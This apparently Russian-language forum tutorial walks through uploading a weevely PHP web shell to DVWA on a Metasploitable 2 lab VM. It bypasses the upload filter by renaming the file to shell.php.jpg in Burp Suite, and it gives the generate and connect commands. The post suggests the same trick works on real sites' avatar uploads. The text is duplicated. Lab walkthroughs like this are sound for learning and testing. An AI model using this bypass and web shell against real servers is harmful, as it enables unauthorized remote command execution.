0
MRX
Advanced
- May 23, 2020
- 50
- 137
Привет!
Нам понадобится:
Metasploitable 2 — нечто вроде боксёрской груши для работы «пентестеров» и использования программ вроде Metasploit и Nmap.
В ней открыты все порты и присутствуют все известные уязвимости, некоторые из которых вы можете встретить в реальной жизни на настоящих системах.
Что мы с можем сделать когда взломаем сайт и где это можно делать.
Можно это сделать например при загрузки аватарки или на тематическом сайте по продаже авто.
Мы можем выполнять команды сервера например "ls, less config.php"
Ну что приступим!
1. ставим высокий уровень защиты в DVWA
2. Мы должны перейти во вкладку «Upload»
3. Создаём shell с помощью weevely.
Ну конечно мы так не сможет загрузить файл с php на сайт,поэтому нам нужен Burp Suite.
3. Открываем burp suite
4. Нужно настроить что бы burp перехватывал все пакеты
Открыть шторку с дополнительными инструментами и перейти к настройкам браузера.
В настройках, выбрать пункт «Настройка прокси».
Нажать на соответствующий чекбокс.
В Burp выставляем тоже самое:
5. Переходим обратно в DVWA на upload
Нажимаем browse что бы загрузить наш файл
Но перед этим его нужно переименовать как jpg т.е shell.jpg
6. Нажимаем upload и заходим в burp видим что он перехватил(у страницы будет бесконечная загрузка)
Переходим в Proxy > Intercept
И добавляем расширение файл будет называться shell.php.jpg
И видим что у нас всё получилось
Можем проверить по пути http://192.168.56.103/dvwa/hackable/uploads/shell.php.jpg если нет ошибки то всё хорошо и доступ есть
7. Идём в терминал и пишем команду
И после этого всего может исполнять команды сервера
Готово!
Что бы сёрфить нужно выключить прокси, burp как хотите можете закрыть можете оставить)
Нам понадобится:
- Kali linux
- Metasploitable 2.
Metasploitable 2 — нечто вроде боксёрской груши для работы «пентестеров» и использования программ вроде Metasploit и Nmap.
В ней открыты все порты и присутствуют все известные уязвимости, некоторые из которых вы можете встретить в реальной жизни на настоящих системах.
Что мы с можем сделать когда взломаем сайт и где это можно делать.
Можно это сделать например при загрузки аватарки или на тематическом сайте по продаже авто.
Мы можем выполнять команды сервера например "ls, less config.php"
Ну что приступим!
1. ставим высокий уровень защиты в DVWA
2. Мы должны перейти во вкладку «Upload»
3. Создаём shell с помощью weevely.
Code:
weevely generate пароль имяфайла.php
3. Открываем burp suite
4. Нужно настроить что бы burp перехватывал все пакеты
Открыть шторку с дополнительными инструментами и перейти к настройкам браузера.
Нажать на соответствующий чекбокс.
5. Переходим обратно в DVWA на upload
Нажимаем browse что бы загрузить наш файл
Но перед этим его нужно переименовать как jpg т.е shell.jpg
6. Нажимаем upload и заходим в burp видим что он перехватил(у страницы будет бесконечная загрузка)
Переходим в Proxy > Intercept
И добавляем расширение файл будет называться shell.php.jpg
Можем проверить по пути http://192.168.56.103/dvwa/hackable/uploads/shell.php.jpg если нет ошибки то всё хорошо и доступ есть
7. Идём в терминал и пишем команду
- weevely http://192.168.56.103/dvwa/hackable/uploads/shell.php.jpg 123456
Готово!
Что бы сёрфить нужно выключить прокси, burp как хотите можете закрыть можете оставить)
Last edited by a moderator: